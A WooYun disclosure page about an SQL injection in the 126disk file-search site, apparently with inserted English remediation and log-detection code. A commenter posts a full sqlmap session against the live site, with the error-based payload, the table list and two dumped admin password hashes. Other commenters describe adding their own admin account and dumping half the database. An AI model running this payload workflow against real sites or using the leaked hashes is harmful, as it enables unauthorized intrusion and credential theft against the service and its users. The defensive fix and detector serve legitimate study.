
Vulnerability summary (24 followers)

Vulnerability ID: wooyun-2012-013279

Title: SQL injection in 126网盘 (126disk), admin back end compromised, sensitive user information exposed

Vendor: 126网盘 (126disk)

Author: Night

Submitted: 2012-10-16 12:09

Fix deadline: 2012-11-30 12:09

Published: 2012-11-30 12:09

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2012-10-16: Actively contacting the vendor and waiting for the vendor to claim the report; details not public
2012-11-30: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Search-type SQL injection in 126网盘 (126disk)

Detailed description:

Injection URL: http://so.126disk.com/search?key=A'

The response page reads: Current location: File search -> A', followed by the empty results-table header (File category | File name | Extension | Size | Upload time) and then the raw database error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' and shenhe<5 and gongxiang='0' and list_d>0 and list_x>0' at line 1

That is, the search key is pasted straight into the LIKE pattern of the query, and a single quote in the key terminates the string literal early; the rest of the WHERE clause is echoed back to the user in the error.

Proof of vulnerability:

Database: 126disk
[24 tables]
+------------------+
| disk_admin       |
| disk_adminlog    |
| disk_adminmsg    |
| disk_collection  |
| disk_count       |
| disk_file        |
| disk_gonggao     |
| disk_guolv       |
| disk_haoyou      |
| disk_integral    |
| disk_integrallog |
| disk_jubao       |
| disk_link        |
| disk_links       |
| disk_message     |
| disk_mulu        |
| disk_search      |
| disk_server      |
| disk_tag         |
| disk_type        |
| disk_user        |
| disk_userlog     |
| disk_visitors    |
| disk_zhuanji     |
+------------------+

Database: 126disk
Table: disk_admin
[1 entry]
+----+-------+----------------------------------+-------+
| id | login | pass                             | user  |
+----+-------+----------------------------------+-------+
| 1  | 9     | [MD5 hash withheld]              | admin |
+----+-------+----------------------------------+-------+


The password hash can be reversed; log straight into the admin back end and take a look.




Testing stops here; I believe getting a shell on a netdisk system is still quite easy.

Remediation:

That is your area of expertise.
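The report leaves remediation to the vendor. As an added example (not code from the report, and not 126网盘's own application code, which the page never shows), the following Python/sqlite3 script rebuilds the leaked query shape on a constructed `disk_file` table, shows that the key `A'` breaks the string-spliced query just as the page's MySQL error does, and places the hardened version beside it: the statement text is constant, the key is bound as a parameter, and LIKE wildcards are escaped. The filter columns (`shenhe`, `gongxiang`, `list_d`, `list_x`) are the ones quoted in the error message; the `name` column, the rows and the request-handler wrapper are assumptions.

```python
import logging
import sqlite3

log = logging.getLogger("search")

# Constructed sample rows standing in for the site's disk_file table. The
# filter columns (shenhe, gongxiang, list_d, list_x) come from the WHERE
# clause leaked in the MySQL error on the page; the `name` column is assumed.
ROWS = [
    ("Annual report.pdf", 1, "0", 5, 3),
    ("A'B notes.txt", 1, "0", 2, 2),
    ("100%_done.zip", 1, "0", 1, 1),
    ("private.doc", 9, "0", 1, 1),   # shenhe >= 5: must never be listed
    ("shared.iso", 1, "1", 1, 1),    # gongxiang != '0': must never be listed
]

# The fixed tail of the WHERE clause, as it appeared in the leaked error.
FILTER = " AND shenhe<5 AND gongxiang='0' AND list_d>0 AND list_x>0 ORDER BY rowid"


def make_db():
    """Create an in-memory database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE disk_file (name TEXT, shenhe INTEGER, gongxiang TEXT, "
        "list_d INTEGER, list_x INTEGER)"
    )
    conn.executemany("INSERT INTO disk_file VALUES (?, ?, ?, ?, ?)", ROWS)
    return conn


def search_unsafe(conn, key):
    """Vulnerable pattern: the user-supplied key is spliced into the SQL text,
    so a quote in the key changes the statement instead of the data."""
    sql = "SELECT name FROM disk_file WHERE name LIKE '%" + key + "%'" + FILTER
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn, key):
    """Hardened pattern: the statement text never changes; the key travels as a
    bound parameter, with LIKE metacharacters escaped so that a user typing
    '%' or '_' searches for those characters instead of matching everything."""
    escaped = key.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT name FROM disk_file WHERE name LIKE ? ESCAPE '\\'" + FILTER
    return [row[0] for row in conn.execute(sql, ("%" + escaped + "%",))]


def unsafe_breaks(conn, key):
    """True if the unsafe query fails to parse for this key, which is the
    failure the page's error message shows."""
    try:
        search_unsafe(conn, key)
        return False
    except sqlite3.Error:
        return True


def run_search(conn, key, impl=search_safe):
    """Request-handler shape: database errors are logged server-side and the
    client only ever sees a generic failure, never the driver's message."""
    try:
        return {"ok": True, "results": impl(conn, key)}
    except sqlite3.Error as exc:
        log.error("search failed for key %r: %s", key, exc)
        return {"ok": False, "results": [], "error": "search failed"}


if __name__ == "__main__":
    db = make_db()
    print("unsafe query breaks on A'  :", unsafe_breaks(db, "A'"))
    print("safe query for A'          :", search_safe(db, "A'"))
    print("safe query for literal %   :", search_safe(db, "%"))
    print("masked error, unsafe impl  :", run_search(db, "A'", impl=search_unsafe))
```

Two points the page's evidence makes and the script reproduces: the injection itself is fixed by binding, not by stripping quotes (the key `A'` is a legitimate search and still works in `search_safe`), and the information leak is a separate defect, fixed by `run_search` never echoing the driver's error text to the client.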

Copyright notice: please credit the source when reposting: Night@乌云 (WooYun)


Vulnerability response

Vendor response:

Vendor could not be reached, or vendor actively refused the report


Vulnerability rating:

Comments

  1. 2012-10-24 01:45 | Any ( Passer-by | Rank:26 Vulns:5 | When I have an eight-pack, will you marry me, girl? )

    root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://so.126disk.com/search?key=2" --dbms

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

    [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at 00:23:31

    [00:23:55] [INFO] testing connection to the target url
    [00:24:14] [INFO] testing if the url is stable, wait a few seconds
    [00:24:15] [INFO] url is stable
    [00:24:15] [INFO] testing if GET parameter 'key' is dynamic
    [00:24:15] [INFO] confirming that GET parameter 'key' is dynamic
    [00:24:18] [WARNING] GET parameter 'key' appears to be not dynamic
    [00:24:19] [WARNING] reflective value(s) found and filtering out
    [00:24:19] [INFO] heuristic test shows that GET parameter 'key' might be injectable (possible DBMS: MySQL)
    [00:24:19] [INFO] testing for SQL injection on GET parameter 'key'
    [00:24:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [00:24:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
    [00:24:25] [INFO] GET parameter 'key' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
    [00:24:25] [INFO] testing 'MySQL > 5.0.11 stacked queries'
    [00:24:26] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
    [00:24:26] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
    [00:24:26] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other injection technique found
    [00:25:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
    GET parameter 'key' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
    sqlmap identified the following injection points with a total of 58 HTTP(s) requests:
    ---
    Place: GET
    Parameter: key
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
        Payload: key=2' AND (SELECT 2708 FROM(SELECT COUNT(*),CONCAT(0x3a73656d3a,(SELECT (CASE WHEN (2708=2708) THEN 1 ELSE 0 END)),0x3a6d7a703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PtbI'='PtbI
    ---
    [00:26:20] [INFO] the back-end DBMS is MySQL
    web server operating system: Windows 2003
    web application technology: Microsoft IIS 6.0, PHP 5.2.17
    back-end DBMS: MySQL 5.0
    [00:26:20] [INFO] fetching database names
    [00:26:21] [INFO] the SQL query used returns 2 entries
    [00:26:21] [INFO] retrieved: information_schema
    [00:26:21] [INFO] retrieved: 126disk
    available databases [2]:
    [*] 126disk
    [*] information_schema

    [00:26:21] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/so.126disk.com'

    [*] shutting down at 00:26:21

    root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://so.126disk.com/search?key=2" --dbms "Mysql" --tables -D"126disk"

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

    [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at 00:31:30

    [00:31:48] [INFO] testing connection to the target url
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: GET
    Parameter: key
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
        Payload: key=2' AND (SELECT 2708 FROM(SELECT COUNT(*),CONCAT(0x3a73656d3a,(SELECT (CASE WHEN (2708=2708) THEN 1 ELSE 0 END)),0x3a6d7a703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PtbI'='PtbI
    ---
    [00:32:06] [INFO] testing MySQL
    [00:32:06] [WARNING] reflective value(s) found and filtering out
    [00:32:06] [INFO] confirming MySQL
    [00:32:07] [INFO] the back-end DBMS is MySQL
    web server operating system: Windows 2003
    web application technology: Microsoft IIS 6.0, PHP 5.2.17
    back-end DBMS: MySQL >= 5.0.0
    [00:32:07] [INFO] fetching tables for database: '126disk'
    [00:32:07] [INFO] the SQL query used returns 24 entries
    [00:32:08] [INFO] retrieved: disk_admin
    [00:32:08] [INFO] retrieved: disk_adminlog
    [00:32:08] [INFO] retrieved: disk_adminmsg
    [00:32:08] [INFO] retrieved: disk_collection
    [00:32:09] [INFO] retrieved: disk_count
    [00:32:09] [INFO] retrieved: disk_file
    [00:32:09] [INFO] retrieved: disk_gonggao
    [00:32:10] [INFO] retrieved: disk_guolv
    [00:32:10] [INFO] retrieved: disk_haoyou
    [00:32:10] [INFO] retrieved: disk_integral
    [00:32:10] [INFO] retrieved: disk_integrallog
    [00:32:10] [INFO] retrieved: disk_jubao
    [00:32:11] [INFO] retrieved: disk_link
    [00:32:11] [INFO] retrieved: disk_links
    [00:32:11] [INFO] retrieved: disk_message
    [00:32:11] [INFO] retrieved: disk_mulu
    [00:32:11] [INFO] retrieved: disk_search
    [00:32:11] [INFO] retrieved: disk_server
    [00:32:12] [INFO] retrieved: disk_tag
    [00:32:12] [INFO] retrieved: disk_type
    [00:32:12] [INFO] retrieved: disk_user
    [00:32:13] [INFO] retrieved: disk_userlog
    [00:32:13] [INFO] retrieved: disk_visitors
    [00:32:13] [INFO] retrieved: disk_zhuanji
    Database: 126disk
    [24 tables]
    +------------------+
    | disk_admin       |
    | disk_adminlog    |
    | disk_adminmsg    |
    | disk_collection  |
    | disk_count       |
    | disk_file        |
    | disk_gonggao     |
    | disk_guolv       |
    | disk_haoyou      |
    | disk_integral    |
    | disk_integrallog |
    | disk_jubao       |
    | disk_link        |
    | disk_links       |
    | disk_message     |
    | disk_mulu        |
    | disk_search      |
    | disk_server      |
    | disk_tag         |
    | disk_type        |
    | disk_user        |
    | disk_userlog     |
    | disk_visitors    |
    | disk_zhuanji     |
    +------------------+

    [00:32:13] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/so.126disk.com'

    [*] shutting down at 00:32:13

    root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://so.126disk.com/search?key=2" --dbms "Mysql" --columns -T"disk_admin" -D"126disk"

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

    [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at 00:33:20

    [00:33:38] [INFO] testing connection to the target url
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: GET
    Parameter: key
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
        Payload: key=2' AND (SELECT 2708 FROM(SELECT COUNT(*),CONCAT(0x3a73656d3a,(SELECT (CASE WHEN (2708=2708) THEN 1 ELSE 0 END)),0x3a6d7a703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PtbI'='PtbI
    ---
    [00:33:56] [INFO] testing MySQL
    [00:33:56] [INFO] confirming MySQL
    [00:33:56] [WARNING] reflective value(s) found and filtering out
    [00:33:56] [INFO] the back-end DBMS is MySQL
    web server operating system: Windows 2003
    web application technology: Microsoft IIS 6.0, PHP 5.2.17
    back-end DBMS: MySQL >= 5.0.0
    [00:33:56] [INFO] fetching columns for table 'disk_admin' in database '126disk'
    [00:33:57] [INFO] the SQL query used returns 4 entries
    [00:34:00] [INFO] retrieved: id
    [00:34:00] [INFO] retrieved: int(11)
    [00:34:00] [INFO] retrieved: user
    [00:34:00] [INFO] retrieved: varchar(20)
    [00:34:01] [INFO] retrieved: pass
    [00:34:01] [INFO] retrieved: varchar(32)
    [00:34:01] [INFO] retrieved: login
    [00:34:01] [INFO] retrieved: int(11)
    Database: 126disk
    Table: disk_admin
    [4 columns]
    +--------+-------------+
    | Column | Type        |
    +--------+-------------+
    | id     | int(11)     |
    | login  | int(11)     |
    | pass   | varchar(32) |
    | user   | varchar(20) |
    +--------+-------------+

    [00:34:01] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/so.126disk.com'

    [*] shutting down at 00:34:01

    root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://so.126disk.com/search?key=2" --dbms "Mysql" --dump -C"user,pass" -T"disk_admin" -D"126disk"

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

    [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at 00:38:10

    [00:38:28] [INFO] testing connection to the target url
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: GET
    Parameter: key
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
        Payload: key=2' AND (SELECT 2708 FROM(SELECT COUNT(*),CONCAT(0x3a73656d3a,(SELECT (CASE WHEN (2708=2708) THEN 1 ELSE 0 END)),0x3a6d7a703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PtbI'='PtbI
    ---
    [00:38:47] [INFO] testing MySQL
    [00:38:47] [INFO] confirming MySQL
    [00:38:47] [INFO] the back-end DBMS is MySQL
    web server operating system: Windows 2003
    web application technology: Microsoft IIS 6.0, PHP 5.2.17
    back-end DBMS: MySQL >= 5.0.0
    do you want sqlmap to consider provided column(s):
    [1] as LIKE column names (default)
    [2] as exact column names
    -v 0
    [00:45:34] [CRITICAL] invalid value

    [*] shutting down at 00:45:34

    root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://so.126disk.com/search?key=2" --dbms "Mysql" --dump -C"user,pass" -T"disk_admin" -D"126disk" -v 0

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

    [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at 00:45:58

    [00:46:16] [INFO] testing connection to the target url
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: GET
    Parameter: key
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
        Payload: key=2' AND (SELECT 2708 FROM(SELECT COUNT(*),CONCAT(0x3a73656d3a,(SELECT (CASE WHEN (2708=2708) THEN 1 ELSE 0 END)),0x3a6d7a703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PtbI'='PtbI
    ---
    [00:46:34] [INFO] testing MySQL
    [00:46:34] [INFO] confirming MySQL
    [00:46:34] [INFO] the back-end DBMS is MySQL
    web server operating system: Windows 2003
    web application technology: Microsoft IIS 6.0, PHP 5.2.17
    back-end DBMS: MySQL >= 5.0.0
    do you want sqlmap to consider provided column(s):
    [1] as LIKE column names (default)
    [2] as exact column names
    >
    [00:52:16] [INFO] fetching columns like 'pass, user' for table 'disk_admin' in database '126disk'
    [00:52:19] [WARNING] reflective value(s) found and filtering out
    [00:52:19] [INFO] the SQL query used returns 2 entries
    [00:52:19] [INFO] retrieved: user
    [00:52:19] [INFO] retrieved: varchar(20)
    [00:52:19] [INFO] retrieved: pass
    [00:52:20] [INFO] retrieved: varchar(32)
    [00:52:20] [INFO] fetching entries of column(s) 'pass, user' for table 'disk_admin' in database '126disk'
    [00:52:20] [INFO] the SQL query used returns 2 entries
    [00:52:20] [INFO] retrieved: b4870218d90c9641481d07f9733d281d
    [00:52:20] [INFO] retrieved: admin1
    [00:52:20] [INFO] retrieved: f6fbd3b2d7a6740fffc6e645df80e15d
    [00:52:21] [INFO] retrieved: admin
    [00:52:21] [INFO] analyzing table dump for possible password hashes
    recognized possible password hashes in column 'pass'. Do you want to crack them via a dictionary-based attack? [Y/n/q] y
    +--------+----------------------------------+
    | user   | pass                             |
    +--------+----------------------------------+
    | admin1 | b4870218d90c9641481d07f9733d281d---245661320|
    | admin  | f6fbd3b2d7a6740fffc6e645df80e15d |
    +--------+----------------------------------+

    It can't be this vulnerability, can it??
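The sqlmap session in the comment above is also what this injection looks like from the server side: first a lone quote in `key`, then an error-based payload built on `FLOOR(RAND(0)*2)` and `GROUP BY`, and a tool user-agent. As an added example (not part of the comment, the report, or the site's code), the following Python script runs a few such heuristics over access-log lines. The log lines are constructed here in combined log format, the payload is the one quoted in the comment, and the sqlmap user-agent string is assumed to be the tool's default; the rule names are this example's own.

```python
import re
from urllib.parse import parse_qs, quote_plus, urlsplit

# Combined log format: ip ident user [time] "request" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A quote followed, before the next quote, by a SQL connective or verb.
KEYWORD_AFTER_QUOTE = re.compile(r"'[^']*\b(and|or|union|select)\b", re.I)
# The duplicate-key trick that sqlmap's MySQL error-based technique relies on,
# as seen in the payload quoted in the comment above.
ERROR_BASED = re.compile(r"floor\(rand\(0\)\*2\).*group by", re.I)


def scan_line(line):
    """Parse one access-log line and return the search key with its findings,
    or None when the line is not in combined log format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    params = parse_qs(urlsplit(m["target"]).query)
    key = params.get("key", [""])[0]          # parse_qs already URL-decodes
    findings = []
    if "sqlmap" in m["ua"].lower():
        findings.append("scanner_user_agent")
    if KEYWORD_AFTER_QUOTE.search(key):
        findings.append("sqli_keyword_after_quote")
    if "information_schema" in key.lower():
        findings.append("information_schema")
    if ERROR_BASED.search(key):
        findings.append("error_based_fingerprint")
    # An odd number of quotes by itself is weak evidence (file names may
    # legitimately contain apostrophes), so it is reported only when nothing
    # stronger fired; it is the shape of the first probe in the report.
    if not findings and key.count("'") % 2 == 1:
        findings.append("unbalanced_quote")
    return {"ip": m["ip"], "ts": m["ts"], "key": key, "findings": findings}


def analyze(log_text):
    """Scan every line; lines that do not parse are skipped."""
    return [r for r in (scan_line(l) for l in log_text.splitlines()) if r]


# --- constructed sample log --------------------------------------------------
# The payload string is the one sqlmap reported in the comment above.
SQLMAP_PAYLOAD = (
    "2' AND (SELECT 2708 FROM(SELECT COUNT(*),CONCAT(0x3a73656d3a,"
    "(SELECT (CASE WHEN (2708=2708) THEN 1 ELSE 0 END)),0x3a6d7a703a,"
    "FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) "
    "AND 'PtbI'='PtbI"
)


def _line(ip, ts, key, ua):
    """Build one constructed log line with the key URL-encoded as a browser would."""
    return (f'{ip} - - [{ts}] "GET /search?key={quote_plus(key)} HTTP/1.1" '
            f'200 2210 "-" "{ua}"')


SAMPLE_LOG = "\n".join([
    _line("10.0.0.5", "16/Oct/2012:12:01:01 +0800", "report", "Mozilla/5.0"),
    _line("10.0.0.5", "16/Oct/2012:12:01:07 +0800", "100% done", "Mozilla/5.0"),
    _line("10.0.0.9", "16/Oct/2012:12:02:30 +0800", "A'", "Mozilla/5.0"),
    _line("10.0.0.9", "16/Oct/2012:12:02:41 +0800", SQLMAP_PAYLOAD,
          "sqlmap/1.0-dev (http://sqlmap.org)"),   # assumed default sqlmap UA
])

if __name__ == "__main__":
    for r in analyze(SAMPLE_LOG):
        print(r["ip"], r["ts"], r["findings"], repr(r["key"][:40]))
```

The `unbalanced_quote` rule is deliberately the weakest: a single `'` in a search term is exactly the probe this report opens with, but it is also what a user searching for "O'Brien" sends, so on its own it should raise a count, not an alert. The other three rules match the later requests in the comment's session and are the ones worth paging on.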

  2. 2012-10-30 17:22 | 245661320 ( Passer-by | Rank:1 Vulns:3 | Endless darkness! )

    @Night Damn, I hadn't even submitted this hole yet and you've already posted it. The admin username I added is still in there. Ugh.

  3. 2012-11-30 14:48 | 小威 ( Regular white hat | Rank:492 Vulns:76 | Never too old to learn! )

    ...I dumped half of this database last time; it was too slow, so I didn't finish.